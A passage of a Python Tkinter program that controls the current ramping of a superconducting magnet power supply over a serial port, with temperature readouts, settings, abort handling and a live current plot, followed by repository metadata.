self.log_entry(f'Error: Heater did not turn off\\n{reading}')\r\n self.state = 'cool_down'\r\n self.log_entry(f'state={self.state}')\r\n self.switch = False\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'white')\r\n process3 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'white')\r\n process3b = Label(self.status, text = 'R = -0.000 A/s', font = font4, bg = 'white')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'yellow')\r\n process4 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'yellow')\r\n stage4.place(relx=0.35, rely=0.85, anchor = E)\r\n process4.place(relx=0.35, rely=0.85, anchor = W)\r\n\r\n elif self.state == 'cool_down':\r\n self.check_temperature('down')\r\n\r\n elif self.state == 'finished':\r\n self.create_blank_status()\r\n\r\n self.interlock = False\r\n return\r\n\r\n self.root.after(500, lambda: self.ramp_down())\r\n\r\n # Gets the current produced by the supply, and updates the times and current arrays\r\n def get_current(self):\r\n self.ser.write(str.encode('GO?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('OUTPUT:', reading).span()[1] + 1\r\n end = re.search('AMPS', reading).span()[0] - 1\r\n current = float(reading[start:end].strip())\r\n\r\n self.time_array.append(time.time()-self.initialTime)\r\n self.current_array.append(current)\r\n return current\r\n\r\n #Checks the current to see if it has reached the setpoint yet\r\n def check_current(self, setpoint, dir):\r\n if setpoint == self.set4 or setpoint == 0:\r\n self.ser.write(str.encode('RS?\\n'))\r\n reading = self.ser.readline().decode()\r\n self.log_entry(reading)\r\n\r\n if re.search('RAMP STATUS: HOLDING ON', reading) != None:\r\n if dir == 'up':\r\n if self.state == 'ramp_up':\r\n self.state = 'heat_on'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_4':\r\n self.state = 'heat_off'\r\n self.log_entry(f'state={self.state}')\r\n elif dir == 'down':\r\n if self.state == 'ramp_down':\r\n self.state = 
'heat_off'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'supply_down':\r\n self.state = 'done'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'abort':\r\n self.state = 'done'\r\n self.log_entry(f'state={self.state}')\r\n\r\n else:\r\n self.get_current()\r\n return\r\n \r\n else:\r\n current = self.get_current()\r\n\r\n if dir == 'up':\r\n if current <= setpoint:\r\n return\r\n elif self.state == 'ramp_1':\r\n self.state = 'set_rate_2'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_2':\r\n self.state = 'set_rate_3'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_3':\r\n self.state = 'set_rate_4'\r\n self.log_entry(f'state={self.state}')\r\n\r\n if dir == 'down':\r\n if current > setpoint:\r\n return\r\n\r\n elif self.state == 'ramp_1':\r\n self.state = 'set_rate_2'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_2':\r\n self.state = 'set_rate_3'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'ramp_3':\r\n self.state = 'set_rate_4'\r\n self.log_entry(f'state={self.state}')\r\n \r\n #This statement likely does nothing but I left it for flow of thought (should be called in previous if statement)\r\n elif self.state == 'supply_down':\r\n self.state = 'done'\r\n self.log_entry(f'state={self.state}')\r\n\r\n\r\n #Checks the switch temperature to ensure it is warmed up\r\n def check_temperature(self, dir):\r\n if dir == 'up':\r\n if self.switchTemp < 6:\r\n return\r\n if self.state == 'warm_up':\r\n self.state = 'start_ramp'\r\n self.log_entry(f'state={self.state}')\r\n \r\n if dir == 'down':\r\n self.log_entry(f'switchTemp = {self.switchTemp} K')\r\n if self.switchTemp > 4.5:\r\n return\r\n if self.state == 'heat_switch':\r\n self.state = 'set_rate'\r\n self.log_entry(f'state={self.state}')\r\n elif self.state == 'cool_down' and self.switchTemp < 4.5:\r\n self.state = 'finished'\r\n self.log_entry(f'state={self.state}')\r\n \r\n\r\n def update_data(self, connection):\r\n self.stage1Temp = connection.get_float(\"Temperature_Cryo_S1\")[1]\r\n self.stage2Temp = connection.get_float(\"Temperature_Cryo_S2\")[1]\r\n self.magnetATemp = connection.get_float(\"Temperature_Cryo_MA\")[1]\r\n self.magnetBTemp = connection.get_float(\"Temperature_Cryo_MB\")[1]\r\n self.switchTemp = connection.get_float(\"Temperature_Cryo_Sw\")[1]\r\n\r\n self.stage1b.config(text = f'{self.stage1Temp:.2f} K')\r\n self.stage2b.config(text = f'{self.stage2Temp:.2f} K')\r\n self.magnetAb.config(text = f'{self.magnetATemp:.2f} K')\r\n self.magnetBb.config(text = f'{self.magnetBTemp:.2f} K')\r\n self.switchb.config(text = f'{self.switchTemp:.2f} K')\r\n\r\n self.temps.after(1000, lambda: self.update_data(connection))\r\n\r\n\r\n #Opens Settings Window, which allows the user to change the persistent global variables V and R\r\n def Settings(self):\r\n settings = Toplevel(self.root)\r\n settings.geometry('400x300')\r\n settings.wm_title(\"Settings\")\r\n if platform.system() == 'Windows':\r\n settings.iconbitmap(\"icons/settings.ico\")\r\n settings.configure(bg='grey95')\r\n L1 = Label(settings, text = 'COM Port:', font = font2, bg='grey95')\r\n L1.place(relx=0.3, rely=0.2, anchor = E)\r\n E1 = Entry(settings, font = font2, width = 6)\r\n E1.insert(0,str(self.port))\r\n E1.place(relx=0.3, rely=0.2, anchor = W)\r\n\r\n L2 = Label(settings, text = 'SQL File:', font = font2, bg='grey95')\r\n L2.place(relx=0.8, rely=0.2, anchor = E)\r\n E2 = Entry(settings, font = font2, width = 5)\r\n 
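#update_data above (like ramp_up and ramp_down earlier) reschedules itself with
#widget.after(ms, callback), so the polling stays on the Tk event loop instead of
#a background thread. A minimal self-contained sketch of the same idiom; the label
#text and the 1000 ms period are illustrative only.
import tkinter as tk

def demo_after_polling():
    root = tk.Tk()
    label = tk.Label(root, text='waiting...')
    label.pack()

    def poll(count=0):
        label.config(text=f'poll #{count}')  #stand-in for a hardware read
        root.after(1000, poll, count + 1)    #reschedule; never blocks the GUI

    poll()
    root.mainloop()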
E2.insert(0,str(self.sqlFile))\r\n E2.place(relx=0.8, rely=0.2, anchor = W)\r\n \r\n L3 = Label(settings, text = 'Rate 1:', font = font2, bg='grey95')\r\n L3.place(relx=0.25, rely=0.4, anchor = E)\r\n E3 = Entry(settings, font = font2, width = 5)\r\n E3.insert(0,str(self.rate1))\r\n E3.place(relx=0.25, rely=0.4, anchor = W)\r\n L3units = Label(settings, text = 'A/s', font = font2, bg = 'grey95')\r\n L3units.place(relx=0.4, rely=0.4, anchor = W)\r\n\r\n L4 = Label(settings, text = 'Set 1:', font = font2, bg='grey95')\r\n L4.place(relx=0.75, rely=0.4, anchor = E)\r\n E4 = Entry(settings, font = font2, width = 5)\r\n E4.insert(0,str(self.set1))\r\n E4.place(relx=0.75, rely=0.4, anchor = W)\r\n L4units = Label(settings, text = 'A', font = font2, bg='grey95')\r\n L4units.place(relx=0.9, rely=0.4, anchor = W)\r\n\r\n L5 = Label(settings, text = 'Rate 2:', font = font2, bg='grey95')\r\n L5.place(relx=0.25, rely=0.5, anchor = E)\r\n E5 = Entry(settings, font = font2, width = 5)\r\n E5.insert(0,str(self.rate2))\r\n E5.place(relx=0.25, rely=0.5, anchor = W)\r\n L5units = Label(settings, text = 'A/s', font = font2, bg = 'grey95')\r\n L5units.place(relx=0.4, rely=0.5, anchor = W)\r\n\r\n L6 = Label(settings, text = 'Set 2:', font = font2, bg='grey95')\r\n L6.place(relx=0.75, rely=0.5, anchor = E)\r\n E6 = Entry(settings, font = font2, width = 5)\r\n E6.insert(0,str(self.set2))\r\n E6.place(relx=0.75, rely=0.5, anchor = W)\r\n L6units = Label(settings, text = 'A', font = font2, bg='grey95')\r\n L6units.place(relx=0.9, rely=0.5, anchor = W)\r\n\r\n L7 = Label(settings, text = 'Rate 3:', font = font2, bg='grey95')\r\n L7.place(relx=0.25, rely=0.6, anchor = E)\r\n E7 = Entry(settings, font = font2, width = 5)\r\n E7.insert(0,str(self.rate3))\r\n E7.place(relx=0.25, rely=0.6, anchor = W)\r\n L7units = Label(settings, text = 'A/s', font = font2, bg = 'grey95')\r\n L7units.place(relx=0.4, rely=0.6, anchor = W)\r\n\r\n L8 = Label(settings, text = 'Set 3:', font = font2, bg='grey95')\r\n L8.place(relx=0.75, rely=0.6, anchor = E)\r\n E8 = Entry(settings, font = font2, width = 5)\r\n E8.insert(0,str(self.set3))\r\n E8.place(relx=0.75, rely=0.6, anchor = W)\r\n L8units = Label(settings, text = 'A', font = font2, bg='grey95')\r\n L8units.place(relx=0.9, rely=0.6, anchor = W)\r\n\r\n L9 = Label(settings, text = 'Rate 4:', font = font2, bg='grey95')\r\n L9.place(relx=0.25, rely=0.7, anchor = E)\r\n E9 = Entry(settings, font = font2, width = 5)\r\n E9.insert(0,str(self.rate4))\r\n E9.place(relx=0.25, rely=0.7, anchor = W)\r\n L9units = Label(settings, text = 'A/s', font = font2, bg = 'grey95')\r\n L9units.place(relx=0.4, rely=0.7, anchor = W)\r\n\r\n L10 = Label(settings, text = 'Set 4:', font = font2, bg='grey95')\r\n L10.place(relx=0.75, rely=0.7, anchor = E)\r\n E10 = Entry(settings, font = font2, width = 5)\r\n E10.insert(0,str(self.set4))\r\n E10.place(relx=0.75, rely=0.7, anchor = W)\r\n L10units = Label(settings, text = 'A', font = font2, bg='grey95')\r\n L10units.place(relx=0.9, rely=0.7, anchor = W)\r\n\r\n b1 = Button(settings, text = 'Update', relief = 'raised', background='lightblue', activebackground='blue', font = font1, width = 10, height = 1,\\\r\n command = lambda: [self.updateSettings(str(E1.get()),str(E2.get()),float(E3.get()),float(E4.get()),float(E5.get()),float(E6.get()),float(E7.get()),float(E8.get()),float(E9.get()), float(E10.get())),settings.destroy()])\r\n b1.place(relx=0.75, rely=0.9, anchor = CENTER)\r\n\r\n b2 = Button(settings, text = 'Reset', relief = 'raised', background='pink', 
activebackground='red', font = font1, width = 10, height = 1, command = lambda: [self.updateSettings('COM6','data',0.292,36,0.219,72,0.123,90,0.052,108.1),settings.destroy()])\r\n b2.place(relx=0.25, rely=0.9, anchor = CENTER)\r\n\r\n #Updates the persistent global variables port and sql, as well as store the ramp rates and set points\r\n def updateSettings(self, E1, E2, E3, E4, E5, E6, E7, E8, E9, E10):\r\n if not self.interlock:\r\n self.port = E1\r\n self.sqlFile = E2\r\n self.rate1 = E3\r\n self.set1 = E4\r\n self.rate2 = E5\r\n self.set2 = E6\r\n self.rate3 = E7\r\n self.set3 = E8\r\n self.rate4 = E9\r\n self.set4 = E10\r\n f = open(\"variables\",'w')\r\n f.write(f'port={self.port}\\nsqlFile={self.sqlFile}\\nrate1={self.rate1},set1={self.set1}\\nrate2={self.rate2},set2={self.set2}\\\r\n \\nrate3={self.rate3},set3={self.set3}\\nrate4={self.rate4},set4={self.set4}')\r\n f.close()\r\n else:\r\n helpMessage ='Cannot change settings while ramping the magnet' \r\n messageVar = Message(self.root, text = helpMessage, font = font2, width = 600) \r\n messageVar.config(bg='firebrick1')\r\n messageVar.place(relx = 0, rely = 1, anchor = SW)\r\n self.root.after(5000, messageVar.destroy)\r\n\r\n\r\n def manualControl(self):\r\n manual = Toplevel(self.root)\r\n manual.geometry('440x330')\r\n manual.wm_title(\"Manual Serial Control\")\r\n if platform.system() == 'Windows':\r\n manual.iconbitmap(\"icons/serial.ico\")\r\n manual.resizable(False, False)\r\n #manual.configure(bg='white')\r\n manual.configure(bg='grey95')\r\n v = Scrollbar(manual, orient = 'vertical')\r\n t = Text(manual, font = font4, bg='white', width = 10, height = 15, wrap = NONE, yscrollcommand = v.set)\r\n t.insert(END, \"*********************************************************************************************************************\\n\")\r\n t.insert(END, \"\\t\\tBasic Commands\\n\\n\")\r\n t.insert(END, \"\\tSet Ramp Rate: SR{rate}?\\n\")\r\n t.insert(END, \"\\tRamp Up: R!\\n\")\r\n t.insert(END, \"\\tRamp Down: R0?\\n\")\r\n t.insert(END, \"\\tRamp Status: RS?\\n\")\r\n t.insert(END, \"\\tHeater Off: H0?\\n\")\r\n t.insert(END, \"\\tHeater On: H1?\\n\")\r\n t.insert(END, \"\\tGet Output: GO?\\n\")\r\n t.insert(END, \"*********************************************************************************************************************\\n\\n\\n\\n\")\r\n t.pack(side=TOP, fill=X)\r\n v.config(command=t.yview)\r\n\r\n \r\n L1 = Label(manual, text = 'Serial Command:', font = font2, bg='grey95')\r\n L1.place(relx=0.45, rely=0.91, anchor = E)\r\n E1 = Entry(manual, font = font2, width = 7)\r\n E1.place(relx=0.45, rely=0.91, anchor = W)\r\n\r\n b1 = Button(manual, text = 'Send', relief = 'raised', background='lightblue', activebackground='blue', font = font1, width = 5, height = 1,\\\r\n command = lambda: self.updateText(E1.get(), t))\r\n b1.place(relx=0.85, rely=0.91, anchor = CENTER)\r\n\r\n if self.ser is None:\r\n try:\r\n self.ser = serial.Serial(self.port, 9600, timeout=3)\r\n except:\r\n self.interlock = False\r\n helpMessage ='Could not connect to magnet controller. 
Check connection and try again'\r\n\r\n self.log_entry(helpMessage)\r\n\r\n messageVar = Message(self.root, text = helpMessage, font = font2, width = 600) \r\n messageVar.config(bg='firebrick1')\r\n messageVar.place(relx = 0, rely = 1, anchor = SW)\r\n self.root.after(5000, messageVar.destroy)\r\n manual.destroy()\r\n return\r\n\r\n def updateText(self, text, t):\r\n t.insert(END, f'{text}\\n')\r\n self.ser.write(str.encode(f'{text}\\n'))\r\n if \"?\" in text:\r\n reading = self.ser.readline().decode()\r\n t.insert(END, f'{reading}\\n')\r\n\r\n \r\n\r\n\r\n #Opens a url in a new tab in the default webbrowser\r\n def callback(url):\r\n webbrowser.open_new_tab(url)\r\n\r\n\r\n #Opens About Window with software information\r\n def About(self):\r\n name = \"Magnet Ramp Controller\"\r\n version = 'Version: 2.0.0'\r\n date = 'Date: 02/27/2022'\r\n support = 'Support: '\r\n url = 'https://github.com/rhmatti/Magnet-Ramp-Controller'\r\n copyrightMessage ='Copyright © 2023 Richard Mattish All Rights Reserved.'\r\n t = Toplevel(self.root)\r\n t.wm_title(\"About\")\r\n t.geometry(\"400x300\")\r\n t.resizable(False, False)\r\n t.configure(background='white')\r\n if platform.system() == 'Windows':\r\n t.iconbitmap(\"icons/magnet.ico\")\r\n l1 = Label(t, text = name, bg='white', fg='blue', font=font2)\r\n l1.place(relx = 0.15, rely = 0.14, anchor = W)\r\n l2 = Label(t, text = version, bg='white', font=font4)\r\n l2.place(relx = 0.15, rely = 0.25, anchor = W)\r\n l3 = Label(t, text = date, bg='white', font=font4)\r\n l3.place(relx = 0.15, rely = 0.35, anchor = W)\r\n l4 = Label(t, text = support, bg = 'white', font=font4)\r\n l4.place(relx = 0.15, rely = 0.45, anchor = W)\r\n l5 = Label(t, text = 'https://github.com/rhmatti/\\nMagnet-Ramp-Controller', bg = 'white', fg = 'blue', font=font4)\r\n l5.place(relx = 0.31, rely=0.48, anchor = W)\r\n l5.bind(\"<Button-1>\", lambda e:\r\n rampController.callback(url))\r\n messageVar = Message(t, text = copyrightMessage, bg='white', font = font4, width = 600)\r\n messageVar.place(relx = 0.5, rely = 1, anchor = S)\r\n\r\n def Instructions(self):\r\n instructions = Toplevel(self.root)\r\n instructions.geometry('1280x720')\r\n instructions.wm_title(\"User Instructions\")\r\n instructions.configure(bg='white')\r\n if platform.system() == 'Windows':\r\n instructions.iconbitmap(\"icons/magnet.ico\")\r\n v = Scrollbar(instructions, orient = 'vertical')\r\n t = Text(instructions, font = font4, bg='white', width = 100, height = 100, wrap = NONE, yscrollcommand = v.set)\r\n t.insert(END, \"*********************************************************************************************************************\\n\")\r\n t.insert(END, \"Program: Magnet Ramp Controller\\n\")\r\n t.insert(END, \"Author: Richard Mattish\\n\")\r\n t.insert(END, \"Last Updated: 02/27/2023\\n\\n\")\r\n t.insert(END, \"Function: This program provides a graphical user interface for controlling\\n\")\r\n t.insert(END, \"\\tthe superconducting magnet in the CUEBIT source.\\n\")\r\n t.insert(END, \"*********************************************************************************************************************\\n\\n\\n\\n\")\r\n\r\n t.pack(side=TOP, fill=X)\r\n v.config(command=t.yview)\r\n\r\n def save_data(self):\r\n fileName = str(filedialog.asksaveasfile(initialdir = desktop,title = \"Save\",filetypes = ((\"Text Document\",\"*.txt*\"),(\"Text Document\",\"*.txt*\"))))\r\n fileName = fileName.split(\"'\")\r\n fileName = fileName[1]\r\n outputFile = open(fileName + '.txt', \"w\")\r\n 
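#The save path above is recovered by stringifying the file handle returned by
#asksaveasfile and splitting on single quotes, which fails for paths that contain
#an apostrophe. A minimal sketch of the more direct call; ask_save_path is a
#hypothetical helper, not part of the original class.
from tkinter import filedialog

def ask_save_path(initialdir):
    #asksaveasfilename returns the chosen path as a plain string ('' on cancel)
    return filedialog.asksaveasfilename(
        initialdir=initialdir, title='Save', defaultextension='.txt',
        filetypes=(('Text Document', '*.txt*'),))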
outputFile.write('Time (s)\\tCurrent (A)\\n\\n')\r\n\r\n #Writes every recorded sample, including the last one\r\n for i in range(len(self.time_array)):\r\n outputFile.write(str(self.time_array[i]) + '\\t' + str(self.current_array[i]) + '\\n')\r\n\r\n outputFile.close()\r\n webbrowser.open(fileName + '.txt')\r\n\r\n def abort(self):\r\n if self.interlock:\r\n\r\n if not self.switch:\r\n #Ramps the magnet current down\r\n self.ser.write(str.encode('R0\\n'))\r\n\r\n #Sets the ramp speed to 0.5 A/s\r\n self.ser.write(str.encode('SR0.5?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.5) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n\r\n elif self.switch:\r\n if self.process == 'energize':\r\n #Ramps the magnet current down\r\n self.ser.write(str.encode('R0\\n'))\r\n\r\n if self.state == 'start_ramp' or self.state == 'ramp_1' or self.state == 'ramp_2' or self.state == 'set_rate_2':\r\n #Sets the ramp speed to 0.2 A/s\r\n self.ser.write(str.encode('SR0.2?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.2) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n else:\r\n #Sets the ramp speed to 0.1 A/s\r\n self.ser.write(str.encode('SR0.1?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.1) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n elif self.process == 'de-energize':\r\n if self.state == 'warm_up' or self.state == 'start_ramp' or self.state == 'ramp_1':\r\n #Sets the ramp speed to 0.1 A/s\r\n self.ser.write(str.encode('SR0.1?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.1) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n else:\r\n #Sets the ramp speed to 0.2 A/s\r\n self.ser.write(str.encode('SR0.2?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.2) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n\r\n\r\n\r\n print('Process Aborted')\r\n self.log_entry('Process Aborted')\r\n\r\n self.state = 'abort'\r\n self.log_entry(f'state={self.state}')\r\n\r\n self.status.destroy()\r\n #Creates Status Box\r\n self.status = Frame(self.root, width = 275, height = 300,background = 'white', highlightbackground = 'black', highlightthickness = 1)\r\n self.status.place(relx = 0.87, rely = 0.4, anchor = CENTER)\r\n #Changes Status Label\r\n statusLabel = Label(self.status, text = 'Status: Aborting', font = font1, bg = 'white', fg = 'red')\r\n statusLabel.place(relx=0.5, rely=0.15, anchor = 
CENTER)\r\n\r\n\r\n #Abortion Process\r\n abortionMessage = f'Process has been aborted.\\nPower supply is ramping\\n down at {rate} A/s'\r\n abortionLabel = Label(self.status, text = abortionMessage, font = font3, bg = 'white', fg = 'red')\r\n abortionLabel.place(relx=0.5, rely=0.5, anchor = CENTER)\r\n\r\n self.monitor_abortion()\r\n\r\n\r\n\r\n def monitor_abortion(self):\r\n self.check_current(0, 'down')\r\n if self.state == 'done':\r\n self.interlock = False\r\n self.create_blank_status()\r\n if self.ser != None:\r\n try:\r\n self.ser.close()\r\n self.ser = None\r\n except:\r\n pass\r\n return\r\n self.root.after(500, lambda: self.monitor_abortion())\r\n\r\n def on_stop(self):\r\n # This is called when the program is exited\r\n self.abort()\r\n\r\n def quitProgram(self):\r\n print('Quit Program')\r\n self.abort()\r\n self.root.destroy()\r\n\r\n def animate(self, i):\r\n self.ax.clear()\r\n xdata = self.time_array\r\n ydata = self.current_array\r\n if len(self.current_array) > 0:\r\n current = self.current_array[len(self.current_array)-1]\r\n self.ax.set_title(f'Magnet Current - {round(current,1)} A')\r\n else:\r\n self.ax.set_title('Magnet Current')\r\n self.ax.plot(xdata,ydata)\r\n self.ax.set_xlabel('Time (s)')\r\n self.ax.set_ylabel('Current (A)')\r\n\r\n def create_blank_status(self):\r\n self.process = None\r\n\r\n if self.status is not None:\r\n self.status.destroy()\r\n #Creates Status Box\r\n self.status = Frame(self.root, width = 275, height = 300,background = 'grey92', highlightbackground = 'black', highlightthickness = 1)\r\n self.status.place(relx = 0.87, rely = 0.4, anchor = CENTER)\r\n statusLabel = Label(self.status, text = 'Status: Off', font = font1, bg = 'grey92', fg = 'blue')\r\n statusLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'grey92')\r\n process1= Label(self.status, text = 'N/A', font = font3, bg = 'grey92')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'grey92')\r\n process2 = Label(self.status, text = 'N/A', font = font3, bg = 'grey92')\r\n stage2.place(relx=0.35, rely=0.45, anchor = E)\r\n process2.place(relx=0.35, rely=0.45, anchor = W)\r\n\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'grey92')\r\n process3 = Label(self.status, text = 'N/A', font = font3, bg = 'grey92')\r\n stage3.place(relx=0.35, rely=0.6, anchor = E)\r\n process3.place(relx=0.35, rely=0.6, anchor = W)\r\n\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'grey92')\r\n process4 = Label(self.status, text = 'N/A', font = font3, bg = 'grey92')\r\n stage4.place(relx=0.35, rely=0.75, anchor = E)\r\n process4.place(relx=0.35, rely=0.75, anchor = W)\r\n\r\n #Message\r\n messageLabel = Label(self.status, text = 'Progress will be shown here\\nwhen a process is started', font = font3, bg = 'grey92')\r\n messageLabel.place(relx=0.5, rely=0.9, anchor = CENTER)\r\n\r\n def startGui(self, root=None):\r\n self.stage1Temp = 40\r\n self.stage2Temp = 4\r\n self.magnetATemp = 4\r\n self.magnetBTemp = 4\r\n self.switchTemp = 4\r\n\r\n from data_client import BaseDataClient\r\n connection = BaseDataClient()\r\n\r\n #This is the GUI for the software\r\n if root == None:\r\n self.root = Tk()\r\n else:\r\n self.root = root\r\n menu = Menu(self.root)\r\n 
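#animate above clears and replots the whole axes on every 500 ms tick, which is
#simple and works fine at this rate. A minimal alternative sketch that updates a
#single Line2D in place with set_data; purely illustrative, not a change the
#original program needs.
import matplotlib.pyplot as plt
import matplotlib.animation as animation

fig, ax = plt.subplots()
line, = ax.plot([], [])
xs, ys = [], []

def animate_frame(i):
    xs.append(i)
    ys.append(i % 5)        #stand-in for a current sample
    line.set_data(xs, ys)
    ax.relim()
    ax.autoscale_view()     #rescale the axes to the new data
    return (line,)

ani = animation.FuncAnimation(fig, animate_frame, interval=500)  #keep a reference
plt.show()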
self.root.config(menu=menu)\r\n\r\n self.root.title(\"Magnet Ramp Controller\")\r\n self.root.geometry(\"1280x768\")\r\n self.root.configure(bg='white')\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.quitProgram)\r\n if platform.system() == 'Windows':\r\n self.root.iconbitmap(\"icons/magnet.ico\")\r\n\r\n\r\n #Creates File menu\r\n filemenu = Menu(menu, tearoff=0)\r\n menu.add_cascade(label=\"File\", menu = filemenu)\r\n filemenu.add_command(label=\"Save\", command = self.save_data, accelerator=\"Ctrl+S\")\r\n filemenu.add_command(label='Settings', command = self.Settings)\r\n filemenu.add_command(label='Manual Control', command = self.manualControl)\r\n filemenu.add_separator()\r\n filemenu.add_command(label='Exit', command= self.quitProgram)\r\n\r\n\r\n #Creates Help menu\r\n helpmenu = Menu(menu, tearoff=0)\r\n menu.add_cascade(label='Help', menu=helpmenu)\r\n helpmenu.add_command(label='Instructions', command = self.Instructions)\r\n helpmenu.add_command(label='About', command = self.About)\r\n\r\n #Creates Temperature Readouts\r\n self.temps = Frame(self.root, width = 225, height = 300,background = 'white', highlightbackground = 'black', highlightthickness = 1)\r\n self.temps.place(relx = 0.12, rely = 0.4, anchor = CENTER)\r\n self.tempLabel = Label(self.temps, text = 'Temperatures', font = font1, bg = 'white', fg = 'blue')\r\n self.tempLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n #Stage 1 Temperature\r\n self.stage1a = Label(self.temps, text = 'Stage 1: ', font = font3, bg = 'white')\r\n self.stage1b= Label(self.temps, text = str(self.stage1Temp) + ' K', font = font3, bg = 'white')\r\n self.stage1a.place(relx=0.5, rely=0.3, anchor = E)\r\n self.stage1b.place(relx=0.5, rely=0.3, anchor = W)\r\n\r\n #Stage 2 Temperature\r\n self.stage2a = Label(self.temps, text = 'Stage 2: ', font = font3, bg = 'white')\r\n self.stage2b = Label(self.temps, text = str(self.stage2Temp) + ' K', font = font3, bg = 'white')\r\n self.stage2a.place(relx=0.5, rely=0.45, anchor = E)\r\n self.stage2b.place(relx=0.5, rely=0.45, anchor = W)\r\n\r\n #Magnet A Temperature\r\n self.magnetAa = Label(self.temps, text = 'Magnet A: ', font = font3, bg = 'white')\r\n self.magnetAb = Label(self.temps, text = str(self.magnetATemp) + ' K', font = font3, bg = 'white')\r\n self.magnetAa.place(relx=0.5, rely=0.6, anchor = E)\r\n self.magnetAb.place(relx=0.5, rely=0.6, anchor = W)\r\n\r\n #Magnet B Temperature\r\n self.magnetBa = Label(self.temps, text = 'Magnet B: ', font = font3, bg = 'white')\r\n self.magnetBb = Label(self.temps, text = str(self.magnetBTemp) + ' K', font = font3, bg = 'white')\r\n self.magnetBa.place(relx=0.5, rely=0.75, anchor = E)\r\n self.magnetBb.place(relx=0.5, rely=0.75, anchor = W)\r\n\r\n #Switch Temperature\r\n self.switcha = Label(self.temps, text = 'Switch: ', font = font3, bg = 'white')\r\n self.switchb = Label(self.temps, text = str(self.switchTemp) + ' K', font = font3, bg = 'white')\r\n self.switcha.place(relx=0.5, rely=0.9, anchor = E)\r\n self.switchb.place(relx=0.5, rely=0.9, anchor = W)\r\n\r\n\r\n #Creates a \"Ramp Up\" Button\r\n b1 = Button(self.root, text = 'Ramp Up', font = font2, relief = 'raised',background='deep sky blue', activebackground='lightblue', width = 13, height = 2,\\\r\n command = lambda: self.start_ramp('up'))\r\n b1.place(relx = 0.35, rely = 0.85, anchor = CENTER)\r\n\r\n b2 = Button(self.root, text = 'Ramp Down', font = font2, relief = 'raised',background = 'orange red', activebackground = 'tomato', width = 13, height = 2,\\\r\n command = lambda: 
self.start_ramp('down'))\r\n b2.place(relx = 0.65, rely = 0.85, anchor = CENTER)\r\n\r\n\r\n b3 = Button(self.root, text = 'Abort Process', font = font2, relief = 'raised',background = 'red', activebackground = 'pink', width = 13, height = 2,\\\r\n command = self.abort)\r\n b3.place(relx = 0.87, rely = 0.7, anchor = CENTER)\r\n\r\n self.update_data(connection)\r\n\r\n #Creates a Plot of the Magnet Power Supply Current\r\n graph = Frame(self.root, padx=10, pady=10, bg='white')\r\n graph.place(relx=0.5, rely = 0.4, anchor = CENTER)\r\n\r\n fig = Figure(figsize=(6,4))\r\n self.ax = fig.add_subplot(111)\r\n freqPlot = FigureCanvasTkAgg(fig, graph)\r\n freqPlot.get_tk_widget().grid(row=0, column=0, columnspan=5, sticky='esnw')\r\n self.ani = animation.FuncAnimation(fig, self.animate, interval = 500)\r\n\r\n self.create_blank_status()\r\n\r\n self.root.mainloop()\r\n\r\nstartProgram()","repo_name":"rhmatti/Magnet-Ramp-Controller","sub_path":"Magnet Ramp Controller.pyw","file_name":"Magnet Ramp Controller.pyw","file_ext":"pyw","file_size_in_byte":60530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7354079346","text":"from sqlalchemy import create_engine\n\ndialeto = 